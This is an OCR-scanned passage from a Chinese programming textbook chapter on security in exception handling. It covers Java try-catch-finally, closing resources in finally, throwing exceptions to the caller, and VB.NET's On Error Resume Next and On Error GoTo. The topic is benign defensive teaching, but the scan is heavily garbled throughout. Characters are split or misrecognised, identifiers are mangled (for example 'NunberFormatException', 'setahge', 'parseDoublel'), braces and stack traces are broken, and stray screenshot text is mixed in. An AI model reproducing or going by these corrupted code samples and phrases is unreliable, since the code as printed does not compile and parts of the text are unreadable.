System. out. println(" 程 序 运行 完 毕 "); 
} 
} 


运行 这 个 程序 ,按照 正常 输入 12, 能 够 输出 正确 结果 ,如 图 4-1 所 示 。 
但 是 ,用 户 的 输入 是 不 可 预计 的 。 如 果 用 户 不 小 心 输 
入 一 个 无 法 转换 成 数值 的 字符 串 , 如 12o, 结 果 如 图 4-2 不 
所 示 。 
界面 上 没有 出 现 结果 ,而 是 打印 了 一 堆 莫名 其 妙 的 
a 如 果 这 个 程序 给 用 户 使 用 ,用 户 会 觉得 莫名 其 4 
ee -个 较为 友好 的 界面 ,至 少 应 该 提示 用 户 格 式 输 错 了 ; 更 
- 步 说 ,这 种 问题 如 果 事 先 不 能 预见 并 且 认 真 处 理 , 严 重 的 情况 下 甚至 会 造成 系统 运 
不 正常 。 


-| 


eption in thread "main” java.lang.NunberFormatException: For input string: "1| 


java. lang .NunberFormatException .forInputStringCNumberFormatException. 


jaua-lang-Integer-parseInt(Integer-javua:456) 
java.lang.Integer.parseIntInteger.java:497) 
P04 _ 01.mainCPO4 01.java:11) 


图 4-2 


从 以 上 的 程序 可 以 看 出 ,异常 的 出 现 ,是 在 程序 编译 通过 的 情况 下 ,程序 运行 过 程 
中 出 现 人 J 需要 有 良好 的 预见 性 ,预先 进行 处 理 , 以 保 
证 系统 的 安全 性 ; 这 就 对 程序 员 提 出 了 更 高 的 要 求 。 实 际 上 ,要 预见 程序 可 能 出 现 的 
所 有 异常 ,几乎 是 不 可 能 的 。 

常见 异常 可 能 出 现 的 场合 如 : 

。 访问 数据 库 时 ,数据 库 停 止 工作 ; 

。 访问 文件 ,文件 恰好 被 男 一 个 程序 访问 ; 

。 输入 一 个 以 0 当 除 数 的 数值 ; 
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。 类 型 转换 ,对 象 未 分 配 内 存 , 等 等 。 

从 上 面 可 能 出 现 异常 的 场合 可 以 看 出 ,异常 是 几乎 所 有 高 级 语言 都 可 能 出 现 的 情 
况 , 在 面向 对 象 的 语言 里 面 ,C++、C# 等 也 会 出 现 类 似 的 情况 ,包括 一 些 非 面向 对 象 的 语 
言 ,如 VB, 也 必须 要 面 对 程 序 运行 过 程 中 的 异常 现象 。 虽 然 处 理 方法 不 同 , 但 本 质 类 似 。 

如 提示 ”值得 一 提 的 是 ,异常 和 错误 实际 上 在 不 同 的 语言 中 ,有 不 同 的 说 法 。 一般 
说 来 ,异常 叫做 Exception, 错 误 叫 做 Error。Java 中 定义 了 Exception 和 Error, 来 处 理 
异常 和 错误 ,本 章 主要 是 针对 下 xception 进行 讲解 ; VB 中 主要 处 理 的 对 象 是 Error, 实 
际 上 和 Java 中 的 Exception 更 加 类 似 , 只 是 说 法 不 同 。 


4.1.2 异常 的 基本 特点 


从 上 节 的 程序 可 以 看 出 ,从 控制 台 的 打印 来 看 ,程序 在 底层 有 一 个 提示 : java. 
lang. NumberFormatException ,意思 是 说 出 现 了 一 个 异常 ,并 且 显 示 了 异常 出 现 的 位 
置 在 第 11 行 ， 


double number = Double. parseDouble(str); 


无 法 将 字符 串 转换 为 数值 。 

该 处 ,异常 类 型 为 : java. lang. NumberFormatException。 可 以 查看 文档 ,找到 该 
类 ,在 文档 中 非常 详细 地 说 明了 该 异常 出 现 的 原因 

Thrown to indicate that the application has attempted to convert a string to 


one of the numeric types，but that the string does not have the appropriate 
format. 


翻译 成 中 文 是 : 当 试图 将 一 个 不 符合 数值 格式 的 字符 串 转 成 数值 时 ,程序 抛 出 该 
类 异常 。 

3 提示 不管 什 么 语言 的 初学 者 ,一 看 到 程序 抛 出 异常 就 非常 县 恨 , 这 很 正常 。 不 
过 ,如 果 在 测试 的 过 程 中 ,程序 出 现 异 常 信息 ,有 时 候 可 以 成 为 排 错 的 良好 手段 。 一 般 
情况 下 ,此 时 可 以 首先 查看 异常 种 类 ,根据 文档 查询 该 种 异常 出 现 的 原因 ; 然后 查看 异 
常 消息 和 异常 出 现 的 地 点 ,可 以 顺利 地 解决 程序 中 出 现 的 问题 。 


当 系统 底 层 出 现 异常 ,实际 上 是 将 异常 用 一 个 对 象 包装 起 来 , 传 给 调用 方 ( 客 户 
端 ) ,俗称 抛 出 (throw)。 比 如 在 上 面 程序 里 面 , 发 生 了 数字 格式 异常 ,这 个 异常 在 底层 
就 被 包装 成 为 java. lang. NumberFormatException 的 对 象 抛 出 。 异 常 对 象 抛 出 给 谁 
呢 ? 抛 出 给 函数 的 调用 者 ; 如 果 调 用 者 具有 对 异常 处 理 的 代码 , 则 将 异常 进行 处 理 ; 
否则 ,将 异常 继续 向 前 抛 出 。 如 果 直 到 用 户 端 还 没有 对 异常 进行 处 理 , 异 常 将 会 在 标准 
输出 (如 控制 台 ) 上 打印 。 

对 于 非 面 向 对 象 语言 ,异常 出 现 的 原理 类 似 。 

程序 中 可 能 出 现 的 异常 有 很 多 种 类 ,如 : 

。 算 术 异 常 ,如 除数 为 0; 

。 数组 越界 异常 ; 

。 类 型 转换 异常 ; 
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。 未 分 配 内 存 异 常 ; 

。 数字 格式 异常 ,等 等 。 

一 般 说 来 ,异常 机 制 的 特点 如 下 : 

代码 中 出 现 异 常 , 在 该 作用 域内 ,出 现 异 常 的 代码 ,其 后 面 的 其 他 代码 将 不 会 执行 。 


如 上 节 代 码 中 ,在 第 11 行 出 现 了 异常 ,那么 第 11 行 后 面 的 代码 将 不 会 执行 ,当然 也 没 ， 


有 打印 “程序 运行 完毕 ”。 其 机 理 如 下 : 


代码 1 


代码 2 出 现 异常 ,后 面 的 代码 3 将 不 被 运行 
代码 3 


由 此 可 见 , 在 复杂 的 系统 中 ,异常 处 理 不 当 , 不 仅仅 是 没有 给 用 户 一 个 友好 界面 的 
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问题 ; 更 重要 的 是 ,如 果 对 异常 不 闻 不 问 ,或 者 不 恰当 地 处 理 异常 ,会 给 系统 带 来 巨大 


的 安全 隐患 。 
如 下 例 : 


1. 打开 文件 连接 

2. 读 文 件 

3. 将 文件 中 的 字符 串 转 为 数值 
4. 关闭 文件 


如 果 在 第 3 步 出 现 异常 , 则 该 文件 的 关闭 代码 不 被 执行 ,这 样 文件 就 一 直 处 于 打开 


状态 ,无 法 被 其 他 程序 使 用 。 
4.2 ”异常 捕获 中 的 安全 


4.2.1 异常 的 捕获 


异常 出 现 之 后 ,可 以 通过 查看 文档 来 了 解 其 发 生 的 原因 。 但 是 ,了 解 异 常 出 现 的 原 | 


因 ,并 不 是 最 终 目的 ,为 了 保证 系统 的 正常 和 安全 运行 ,将 异常 进行 有 效 的 处 理 , 才 是 我 
们 所 需要 的 。 

比如 在 4. 1 节 中 的 案例 ,异常 出 现时 ,怎样 进行 处 理 才能 让 界面 更 加 友好 ,系统 更 
加 安全 ? 

要 想 进行 异常 处 理 , 首 先 必须 将 异常 进行 捕获 (catch) ,在 面向 对 象 的 语言 中 ,可 以 
有 两 种 方法 进行 异常 的 捕获 : 

。 就 地 捕捉 异常 

。 将 异常 向 前 端 ( 调 用 方 ) 抛 出 。 

当 一 个 模块 中 可 能 出 现 异常 时 ,一 般 情况 下 ,可 以 就 地 捕捉 异常 ,过 程 如 下 : 

(1) 用 try 块 将 可 能 出 现 异常 的 代码 包 起 来 ; 

(2) 用 catch 块 来 捕获 异常 并 处 理 异常 ; 
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(3) 如 果 有 一 些 工 作 是 不 管 异常 是 否 出 现 都 要 执行 的 , 则 将 相应 的 代码 用 finally 


块 将 其 包 起 来 。 


格式 如 下 : 


try 
E 
// 可 能 出 现 异常 的 代码 
} 
catch(Exceptionl ex1) 
{ 
/* 处 理 异常 */ 
} 
finally 
f 
// 不 管 异常 是 否 出 现 都 要 运行 的 代码 


六 提示。 对 于 try-catch-finally 结构 ,有 如 下 规定 : 
。 一 个 try 后 面 必 须 至 少 接 一 个 catch 块 ; 

。 try 后 面 可 以 不 接 finally 块 ; 

。 try 后 面 最 多 只 能 有 一 个 finally 块 。 


此 时 ,代码 的 运行 机 制 变 为 : 当 程序 中 出 现 异 常 时 ,try 块 后 剩余 的 内 容 不 执行 , 转 


而 执行 catch 块 ; 不 管 是 否 出 现 异常 ,catch 块 是 否 执行 ,最 后 都 会 执行 finally 块 。 其 
机 理 如 下 : 


try 
{ 
代码 1 


代码 2 出 现 异常 ,后 面 的 代码 3 将 不 被 运行 ,运行 代码 4 
代码 3 
} 
catch( Exceptionl ex1) 
上 
代码 4 运行 之 后 ,运行 代码 5, 如 果 没 有 代码 5, 则 运行 代码 6 
} 
finally 
{ 
代码 5 运行 之 后 ,运行 代码 6 
} 
代码 6 


因此 ,上 节 中 ,访问 文件 的 例子 也 就 可 以 修改 为 : 


try 
{ 
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1. 打开 文件 连接 
2. 读 文 件 
3. 将 文件 中 的 字符 串 转 为 数值 
catch(Exceptionl ex1) 
C 
/* 处 理 异常 */ 
finally 
{ 
4. 关闭 文件 
上 


如 果 在 第 3 步 出 现 异 常 ,由 于 关闭 文件 的 工作 写 在 finally 块 内 , 则 该 文件 的 关闭 
还 是 会 被 执行 ,保证 了 程序 的 安全 性 。 


4.2.2 异常 捕获 中 的 安全 


如 前 所 述 ,一 个 try 后 面 必 须 至 少 接 一 个 catch, 可 以 不 接 finally, 但 是 最 多 只 能 有 
一 个 finally。 我 们 知道 ,代码 中 可 能 出 现 的 异常 会 有 很 多 种 类 。 如 Java 中 常见 的 就 有 
未 分 配 内 存 异常 .未 找到 文件 异常 .数据库 异常 格式 转换 异常 ,类 型 转换 异常 ,等 等 。 
由 于 无 法 将 所 有 的 异常 进行 预见 ,怎样 尽 可 能 地 捕获 程序 中 可 能 出 现 的 异常 呢 ? 

由 于 try 块 后 面 可 以 接 多 个 catch 块 ,因此 ,可 以 将 某 一 个 catch 用 于 捕获 某 种 异 
常 。 当 try 中 出 现 异常 ,程序 将 在 catch 中 寻找 是 否 有 相应 的 异常 类 型 的 处 理 代码 ,如 
果 有 ,就 处 理 , 如 果 没有 ,继续 向 下 找 。 所 以 如 果 要 想 让 代码 处 理 所 有 可 能 预见 的 异常 ， 
可 以 用 如 下 方法 : 


try 
{ 
// 可 能 出 现 异常 的 代码 
} 
catch( 可 预见 的 Exceptionl exl) 
{ 
/* 处 理 1*/ 
} 
catch( 可 预见 的 Exception2 ex2) 
{ 
/* 处 理 2*/ 
} 


finally 
{ 

// 可 选 
} 


此 时 ,该 代码 的 机 制 变 为 如 下 : | 
当 try 块 内 的 代码 如 果 出 现 异常 ,程序 则 在 catch 块 内 寻找 匹配 的 异常 处 理 catch ， 
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DD 
“ 


块 , 进 行 处 理 ; 然后 运行 finally 块 。 
以 前 面 打开 文件 的 代码 案例 为 例 , 也 就 可 以 修改 为 : 


上 
A | { 
| 1. 打开 文件 连接 


3. 将 文件 中 的 字符 串 转 为 数值 
i exl) 
/* 处 理 文件 型 异常 */ 
cat 字 信 和 扩 只 ex2) 
! /* 处 理 字符 串 转换 型 异常 */ 
2 
4. 关闭 文件 
} 


但 是 ,以 上 代码 还 不 能 说 是 绝对 安全 的 ,由 于 系统 的 复杂 性 ,此 时 能 够 预见 的 异常 
有 文件 型 异常 和 字符 串 转换 的 异常 ,但 是 还 可 能 有 无 法 预见 的 异常 ,由 于 异常 种 类 繁 
多 ,很 多 种 类 的 异常 处 理 块 排列 在 try 块 下 方 ,导致 程序 规模 过 大 ,怎样 用 比较 简便 的 
方法 ,将 异常 一网打尽 ” 呢 ? 在 异常 处 理 机 制 中 ,可 以 加 入 一 个 catch 块 来 处 理 其 他 不 
可 预见 的 异常 ,代码 变 为 ， 


try 
{ 
1. 打开 文件 连接 


2. 读 文件 
3. 将 文件 中 的 字符 串 转 为 数值 


} 
catch( 文 件 型 异常 exl) 
{ 


/* 处 理 文件 型 异常 * / 
} 
catch( 字 符 串 转换 型 异常 ex2) 
{ 


/* 处 理 字符 串 转换 型 异常 */ 
i ex) 
/* 处 理 其 他 不 可 预见 的 异常 */ 
a 
{ 
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4. 关闭 文件 


3 提示 。 应 该 指出 的 是 : catch(Exception ex) 必须 写 在 catch 块 的 最 后 一 个 ,以 保 
只 有 前 面 无 法 处 理 的 异常 , 才 被 这 个 块 处 理 。 


于 是 ,上 节 中 的 案例 ,可 以 改造 成 如 下 代码 : 
P04_02. java 


import java. io. *; 


public class P04_02 
{ 
public static void main(String[ ] args) 
{ 

try 

{ 
InputStreamReader isr = new InputStreamReader(System. in); 
BufferedReader br = new BufferedReader(isr); 
/* 用 户 输入 一 个 数字 * / 
System. out.print(" 请 您 输入 一 个 数字 : "); 
String str = br.readLine(); 
/* 转换 成 double* / 
double number = Double. parseDouble(str); 
/* 打印 结果 * / 
double result = number * number; 
System. out. println(" 结 果 是 : " + result); 

} 

catch( NumberFormatException ex) 

{ 
/* 处 理 输入 格式 异常 */ 
System. out. println(" 对 不 起 , 您 输入 的 格式 错误 "); 

} 

catch( IOException ex) 

{ 
/* 处 理 I0 异 常 ,注意 ,此 处 是 必须 要 处 理 的 ， 
具体 原因 可 以 参考 InputStreamReader 和 BufferedReader 文档 * / 
System. out. println(" 对 不 起 , I0 异常 "); 

t 

catch( Exception ex) 

{ 


/x* try 代码 中 还 可 能 有 其 他 异常 */ 
System. out. println(" 对 不 起 ,程序 异常 "); 
} 
finally 


{ 
System. out. println( "程序 运行 完毕 "); 
} 
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运行 这 个 程序 ,按照 正常 输入 12, 能 够 打印 正确 结果 。 如 果 用 户 不 小 心 输入 一 个 
无 法 转换 成 数值 的 字符 串 ,如 12o, 结 果 如 图 4-3 所 示 。 

界面 友好 ,并 能 够 在 catch 块 中 处 理 异 常 。 

关于 以 上 代码 ,有 两 点 需要 注意 : I 

(1) 将 大 量 代码 放 入 try 块 ,虽然 可 以 保证 安全 
性 ,但 是 系统 开销 较 大 ,程序 员 务 必 在 系统 开销 和 安全 
性 之 间 找 到 一 个 平衡 。 

(2) 以 上 代码 的 catch 块 中 ,是 简单 的 打印 提示 信息 ,实际 的 系统 中 ,可 能 要 根据 实 
际 需求 来 使 用 不 同 的 异常 处 理 方法 。 


4.3 ”异常 处 理 中 的 安全 


”4.3.1 finally 的 使 用 安全 


在 异常 处 理 过 程 中 ,finally 块 是 可 选 的 ,实际 上 ,finally 是 为 了 更 大 程度 上 保证 程 
序 的 安全 性 。 看 如 下 代码 : 


public void fun() 
{ 
try 
{ 
// 连接 文件 
// 读 取 文件 
// 关闭 文件 
} 
catch( Exception ex) 
{ 
// 处 理 异常 
} 
} 


函数 fun 中 ,try 块 内 进行 连接 文件 、 读 取 文 件 和 关闭 文件 的 工作 ,catch 内 处 理 异 
常 ,根据 前 面 的 介绍 ,该 代码 不 安全 。 如 果 程 序 在 连接 文件 之 后 ,由 于 某 些 不 可 预见 的 
原因 ,出 现 异 常 ,程序 将 会 在 catch 块 中 直接 处 理 异 常 , 但 是 文件 没有 关闭 ,给 文件 访问 
带 来 隐患 ,怎么 办 ? 难道 在 catch 内 增加 关闭 文件 的 代码 吗 ? 这 样 关 闭 文件 就 写 了 两 
次 了 。 在 这 里 可 以 用 finally 来 实现 : 


public void fun() 
{ 
try 
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// 连接 文件 
// 读 取 文 件 
} 
catch( Exception ex) 
{ 
// 处 理 异常 


} 
finally 
{ 
// 关闭 文件 
} 


不 管 前 面 是 否 发 生 异常 ,finally 块 中 的 代码 都 会 执行 。 所 以 这 段 代码 是 安全 的 。 
不 过 ,这 其 中 隐 含 着 另 一 个 问题 : finally 的 出 现 似乎 是 可 有 可 无 的 ! 
如 果 将 上 面 的 结构 改 为 如 下 : 


public void fun() 
{ 
try 
{ 
// 连接 文件 
// 读 取 文件 
} 
catch( Exception ex) 
{ 
// 处 理 异常 
} 
// 关闭 文件 
} 


不 管 是 否 出 现 异常 ,在 该 程序 结构 中 ,关闭 文件 的 工作 也 会 进行 。 那 么 ,代码 放 在 
finally 块 内 ,是 否 和 不 放 在 finally 块 内 效果 一 样 呢 ? 也 就 是 说 ,finally 是 否 可 以 省 略 | 
呢 ? 以 Java 为 例 ,修改 本 章 案 例 的 代码 为 : | 


P04_03. java 


import java io. #; 


public class P04_03 
. 
public static void main(String[ ] args) 
{ 
try 
{ 
InputStreamReader isr = new InputStreamReader(System. in); 
BufferedReader br = new BufferedReader(isr); 
/x* 用 户 输入 一 个 数字 * / 
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System. out.print(" 请 您 输入 一 个 数字 : "); 
String str = br. readLine(); 
/* 转换 成 double* / 
double number = Double.parseDoublel(str); 
/* 打印 结果 * / 
double result = number * number; 
System. out. println(" 结 果 是 : ”+ result); 
} 
catch(Exception ex) 
{ 
/* 此 处 从 简 */ 
System. out.println(" 对 不 起 ,程序 异常 "); 
} 
finally 
{ 
System. out. println( "程序 运行 完毕 "); 
} 


} 


如 果 用 户 不 小 心 输入 一 个 无 法 转换 成 数值 的 字符 串 ,如 12o, 结 果 如 图 4-4 所 示 。 


说 明 finally 内 的 内 容 已 经 运行 。 
但 是 将 代码 改 为 : 


P04_04. java 


import java. io. *; 


public class P04_04 
{ 
public static void main(String[ ] args) 
| 
try 
{ 
InputStreamReader isr = new InputStreamReader(System. in); 
BufferedReader br = new BufferedReader(isr); 
/x* 用 户 输入 一 个 数字 * / 
System. out.print(" 请 您 输入 一 个 数字 : "); 
String str = br. readLine(); 
/* 转换 成 doublex*/ 
double number = Double.parseDouble(str); 
/* 打印 结果 * / 
double result = number x number; 
System. out. println( "结果 是 : " + result); 
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} 
catch(Exception ex) 
{ 
/* 此 处 从 简 */ 
System. out. println(" 对 不 起 ,程序 异常 "); 
} 


/* 注意 : 此 处 没有 用 finally*/ 
System. out. println(" 程 序 运行 完毕 "); 
} 

} 


用 户 输入 字符 串 ,如 12o, 结 果 如 图 4-5 所 示 。 


说 明代 码 段 : 


System. out. println(" 程 序 运行 完毕 ") ; 


照样 运行 。 

在 这 种 情况 下 ,有 finally 和 没有 finally 结果 是 一 样 的 ,这 是 否 说 明 ,finally 可 有 可 
无 呢 ? 

不 是 的 ,finally 最 大 的 特点 就 是 : 在 try 块 内 即使 跳出 了 代码 块 ,甚至 跳出 函数 ， 
finally 内 的 代码 仍然 能 够 运行 。 

为 了 讲解 这 个 问题 ,观察 如 下 程序 : 


P04_05. java 


public class P04_05 
{ 
public static void main(String[ ] args) 
{ 
try 
{ 
System. out. println(" 连 接 文件 , 读 取 文件 "); 


/x* 跳出 函数 */ 
return; 
} 
catch( Exception ex) 
{ 
System. out. println(" 处 理 异 常 "); 
} 
finally 
{ 


System. out. println(" 关 闭 文件 "); 
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该 代码 在 try 块 内 包含 了 一 个 return 语句 。 也 就 是 说 ,在 try 块 内 直接 跳出 了 函 


数 。 运 行 结果 如 图 4-6 所 示 。 


ST C:\Program Files\Xin 


而 如 果 改 为 : 


P04_06. java 


public class P04_06 
{ 
public static void main(String[ ] args) 
{ 
try 
. 
System. out. println(" 连 接 文件 , 读 取 文 件 "); 
/x* 跳出 函数 */ 
return; 
} 
catch( Exception ex) 
{ 
System. out. println(" 处 理 异常 "); 
} 
/* 此 处 没有 finally*/ 
System. out. println(" 关 闭 文件 "); 
} 
} 


运行 结果 如 图 4-7 所 示 。 


图 4-7 


“关闭 文件 ”将 不 会 打印 ,这 说 明 finally 在 保证 系统 的 可 靠 性 方面 ,并 不 是 可 有 可 
无 的 ,不 管 程序 在 try 或 者 catch 块 内 如 何 跳 转 ,只 要 执行 了 try, 它 所 对 应 的 finally 一 
定 会 执行 。 所 以 ,为 了 系统 的 安全 考虑 ,必须 充分 利用 finally 的 优势 ,一定 要 将 最 后 的 
收尾 工作 写 在 finally 块 内 。 
4.3.2 异常 处 理 的 安全 


异常 通常 有 : 就 地 处 理 和 向 客户 端 传递 两 种 处 理 方法 。 就 地 处 理 就 是 在 出 现 异 常 
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的 模块 中 处 理 异常 ,基本 框架 如 下 : 


try 
{ 
/* 可 能 出 现 异常 的 代码 * / 
} 
catch( Exception exl) 
{ 
/* 异 常 处 理 */ 
} 
finally 
{ 
/* 可 选 */ 
} 


这 在 前 面 已 经 进行 了 讲解 。 另 一 种 是 向 客户 端 ( 调 用 方 ) 传 递 , 由 调用 方 将 异常 捕 
获 处 理 ,当然 ,调用 方 也 可 以 继续 抛 出 ,直到 有 一 个 模块 处 理 它 为 止 。 该 模型 的 基本 框 
架 如 下 : 


public void fun() throws Exception 
{ 
try 
{ 
/x* 可 能 出 现 异 常 的 代码 * / 
} 
catch(Exception ex1) 


{ 
/* 向 客户 端 抛 出 */ 
throw exl; 

} 

finally 

下 
/* 可 选 */ 

} 

} 


客户 端 可 以 将 该 异常 就 地 处 理 , 也 可 以 继续 抛 出 。 其 中 ,就 地 处 理 异常 的 代码 框架 
如 下 : 


try 
{ 
/* 调 用 fun()*/ 
fun(); 
} 
catch( Exception ex1) 
{ 
/* 处 理 异常 */ 
} 
finally 
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/* 可 选 */ 
} 


程序 中 的 异常 ,是 就 地 处 理 还 是 向 客户 端 传 递 , 要 遵循 下 列 原则 : 

(1) 就 地 处 理 方法 可 以 很 方便 地 定义 提示 信息 ,对 于 一 些 比较 简单 的 异常 处 理 ,可 
以 选用 这 种 方法 。 

(2) 向 客户 端 传递 的 方法 ,其 优势 在 于 可 以 充分 发 挥 客户 端的 能 力 ,如 果 异 常 的 处 


理 依赖 于 客户 端 ,或 者 某 些 处 理 过 程 在 本 地 无 法 完成 ,就 必须 向 客户 端 传递 。 举 一 个 


例子 ,如 数据 库 连接 代码 ,可 能 出 现 异常 ,但 是 异常 的 处 理 最 好 传递 给 客户 端 ,因为 
客户 端 在 调用 这 块 代码 的 同时 ,可 能 要 根据 实际 情况 ,获取 环境 参数 ,进行 比较 复杂 
的 处 理 。 

考察 如 下 案例 : 在 一 个 注册 系统 中 ,有 一 个 Customer 类 ,里 面 有 一 个 age 成 员 ,用 
一 个 setAge 方法 来 给 age 赋值。 代码 如 下 : 


class Customer 
{ 

Private String name; 

Private int age; 

public void setAge( int age) 

{ 

this.age = age; 

} 
和 


此 时 发 现 ,age 成 员 可 以 随意 赋值 ,但 是 大 多 数 人 的 年 龄 在 0 一 100 之 间 , 因 此 ,和希 
望 在 Customer 类 被 调用 时 ,如 果 setAge 函数 输入 一 个 不 是 0 一 100 之 间 的 参数 ,就 应 


。 提示 异常 。 在 setAge 丽 数 中 就 可 以 在 age 参数 不 正常 时 用 以 下 语句 抽出 异常 对 象 
| setAge 方法 代码 可 以 改 为 : 


public void setahge( int age) throws Exception 
{ 
if(age>= 0&&age<=100) 
{ 
this.age = age; 
} 
else 
{ 
// 抛 出 异常 对 象 
throw new Exception(String. valueOf (age)); 


} 


此 处 的 方法 就 是 将 异常 抛 给 客户 端 。 在 客户 端 用 try-catch 捕捉 异常 对 象 。 代 码 
如 下 : 
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Customer cus = new Customer(); 
cus. setAge(1000); 
} 
catch( Exception ex) 
{ 
/* 捕获 异常 对 象 * / 
/* 处 理 异 常 ,可 以 很 丰富 * / 
System. out. println(ex. getMessage() ); 
} 


这 样 做 的 好 处 是 : 在 客户 端 可 以 进行 更 为 丰富 的 异常 处 理 ,不 仅 增加 了 可 扩展 性 ， 
也 可 以 做 到 更 加 安全 的 代码 保障 。 所 以 ,一 般 情 况 下 ,模块 中 的 异常 ,如 果 确定 可 以 就 
地 处 理 则 可 ; 否则 ,就 应 该 向 客户 端 抛 出 。 

不 过 ,异常 不 断 向 客户 端 抛 出 ,会 增加 系统 开销 。 实 际 上 ,在 自 定义 异常 的 时 候 也 
会 遇见 相同 的 问题 ,其 原理 类 似 。 

提示 “为 什么 要 自 定义 异常 ? 

异常 的 处 理 可 以 让 软件 界面 更 加 友好 ,并 且 更 加 安全 。 但 是 有 可 能 需要 设计 类 库 
中 没有 出 现 过 的 异常 。 

如 前 面 的 例子 中 ,如 果 操 作 员 输入 错误 的 格式 ,如 *1o"”“dsf” 等 ,用 传统 的 异常 处 
理 技术 ,系统 会 打印 “输入 格式 错误 ”, 达 到 了 要 求 。 

但 是 ,此 时 如 果 需 要 将 异常 信息 和 异常 出 现 的 时 间 都 封装 在 一 起 ,作为 一 个 整体 抛 
出 ,怎么 办 呢 ? 此 时 就 可 以 定义 一 种 新 的 异常 ,封装 异常 信息 和 发 生 的 时 间 , 这 就 是 自 
定义 异常 。 

很 多 语言 中 都 有 自 定 义 异 常 的 知识 ,读者 可 以 查阅 相关 的 参考 资料 。 


4.4 面向 过 程 异 常 处 理 中 的 安全 问题 


4.4.1 面向 过 程 的 异常 处 理 
综合 各 种 语言 的 特性 ,异常 处 理 机 制 一 共有 两 种 : 


(1) 面向 对 象 的 异常 处 理 机 制 。 主 要 针对 面向 对 象 的 语言 ,一般 是 使 用 try-catch- 


finally 结构 来 处 理 异 常 ,前 面 所 叙述 的 异常 处 理 机 制 都 是 面向 对 象 的 异常 处 理 机 制 。 
(2) 面向 过 程 的 异常 处 理 机 制 。 实 际 上 ,对 于 一 些 非 面向 对 象 的 语言 ,如 VB, 早 期 
也 具有 异常 处 理 机 制 ,这 就 是 面向 过 程 的 异常 处 理 机 制 。 甚 至 在 面向 对 象 的 语言 ,如 


VB.NET 中 ,除了 推出 面向 对 象 的 异常 处 理 机 制 外 ,也 保留 了 面向 过 程 的 异常 处 理 机 


制 。 主 要 以 On Error 结构 为 代表 。 


不 可 否认 ,try 结构 让 异常 处 理 变 得 更 加 轻松 异常 的 层次 更 为 清晰 。 但 是 由 于 On 


Error 结构 的 灵活 性 ,加 之 某 些 语言 面向 过 程 的 特性 ,On Error 也 具有 大 量 的 使 用 场合 。 
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注意 ,On Error 虽然 有 Error 这 个 词语 ,但 是 处 理 的 大 部 分 都 是 异常 出 现 的 场合 ， 
异常 和 错误 是 不 同 的 概念 ,本 书 中 主要 是 针对 异常 进行 讲解 。 
On Error 的 使 用 主要 有 如 下 两 种 方式 。 
贷 六 | 1. 使 用 On Error Resume Next 以 忽略 错误 
On Error Resume Next 语句 规定 ,代码 中 的 错误 将 完全 被 忽略 ,存在 错误 的 代码 
，” 行 被 跳 过 ,然后 继续 执行 下 一 个 语句 。 
| 以 用 户 输 入 一 个 数字 ,打印 其 平方 为 例 ,用 VB. NET 编写 一 个 同样 的 代码 : 
P04_07. vb 


Module P04_07 
Sub Main( ) 
' 用 户 输入 一 个 数字 
Console. Write(" 请 您 输入 一 个 数字 : ") 
Dim str Rs String = Console.ReadLine( ) 
' 转 换 成 double 
Dim number As Double = Double.Parse(str) 
' 打 印 结果 
Dim result As Double = number #* number 
Console. WriteLine(" 结 果 是 : " & result) 
Console. WriteLine(" 程 序 运 行 完毕 ") 
End Sub 
End Module 


该 代码 如 果 用 户 输入 正确 的 数值 ,能够 打印 正确 结果 ,如 图 4-8 所 示 。 
但 是 如 果 输 入 格式 错误 的 数值 , 则 会 出 现 异 常 ,如 图 4-9 所 示 。 


图 |D: \BackUp\ 我 的 文档 \Yi 


“System. 了 ormatException” 类 型 的 异常 出 现在 
dl 中 。 


未 处 理 的 
人 \ nscorlit. 


其 他 信息 : 输入 字符 审 的 格式 不 正确 。 
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如 果 用 On Error Resume Next 来 处 理 异常 ,可 以 改 为 : 
P04_08. vb 


Module P04_08 
Sub Main( ) 

' 遇 到 异常 ,忽略 
On Error Resume Next 
' 用 户 输入 一 个 数字 
Console. Write(" 请 您 输入 一 个 数字 : ") 
Dim str As String = Console.ReadLine() 
"转换 成 double 
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Dim number As Double = Double.Parse(str) 
"打印 结果 
Dim result As Double = number * number 
Console. WriteLine(" 结 果 是 : " & result) 
Console. WriteLine( "程序 运行 完毕 ") 
End Sub 
End Module 


如 果 输 入 格式 错误 的 数值 , 则 结果 如 图 4-10 所 示 。 
可 见 ,在 出 现 异常 时 ,程序 可 以 忽略 ,继续 向 下 执行 。 该 方法 对 异常 进行 处 理 最 简 
单 ,但 是 也 最 不 安全 。 


加 D: \Backlp\ 我 的 文档 \Yi si DD:\BackUp\ 我 的 文档 MWis 
请 剑 辆 》 :下 二 ， 


2. 使 用 On Error GoTo 转移 代码 的 执行 
许多 情况 下 , 当 出 现代 码 错误 时 ,必须 执行 某 些 操作 ,将 代码 的 执行 转移 到 On 
Error GoTo 语句 中 指定 的 错误 处 理 程序 。 例 如 : 


On Error GoTo line/lable 


使 用 较 多 的 是 lable,line/lable 必须 是 指 与 On Error GoTo 语句 相同 的 过 程 中 的 
-个 语句 。 如 上 面 的 代码 可 以 改 为 : 


P04_09. vb 


Module P04_09 
Sub Main() 
' 遇 到 异常 , 跳 到 handle 执行 
On Error GoTo handle 
' 用 户 输入 一 个 数字 
Console. Write(" 请 您 输入 一 个 数字 : ") 
Dim str As String = Console.ReadLine() 
' 转 换 成 double 
Dim number As Double = Double.Parse(str) 
' 打 印 结果 
Dim result As Double = number * number 
Console. WriteLine(" 结 果 是 : " & result) 
Console. WriteLine(" 程 序 运 行 完毕 ") 
Exit Sub 
handle: 
Console. WriteLine(" 对 不 起 ,程序 异常 ") 
Console. WriteLine(" 程 序 运行 完毕 ") 
End Sub 
End Module 


当 用 户 输入 格式 错误 时 ,程序 能 够 处 理 异 常 ,如 图 4-11 所 示 。 
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4.4.2 安全 准则 


面向 过 程 的 异常 处 理 中 ,为 了 保证 程序 安全 性 ,必须 注意 以 下 几 个 准则 : 

(1) On Error Resume Next 语句 虽然 简单 ,但 是 由 于 没有 对 异常 进行 处 理 , 因 此 也 
是 最 危险 的 方法 。 除 非 十 分 确定 异常 不 用 专门 处 理 , 否 则 不 要 使 用 On Error Resume 
Next 语句 。 

(2) On Error GoTo 语句 可 以 较 好 地 进行 异常 处 理 , 并 且 可 以 随意 跳 转 ,理论 上 
讲 , 可 以 跳 到 程序 的 任意 部 位 来 处 理 异常 ,比较 灵活 ,使 用 场合 较 多 。 但 是 ,大 量 使 用 跳 
转 , 会 让 程序 逻辑 相对 复杂 ,反而 造成 其 他 逻辑 上 的 安全 隐患 。 因 此 ,On Error GoTo 
语句 不 宜 使 用 太 复 杂 。 一 般 情 况 下 ,程序 中 最 好 将 处 理 异 常 的 代码 放 在 统一 的 地 方 。 
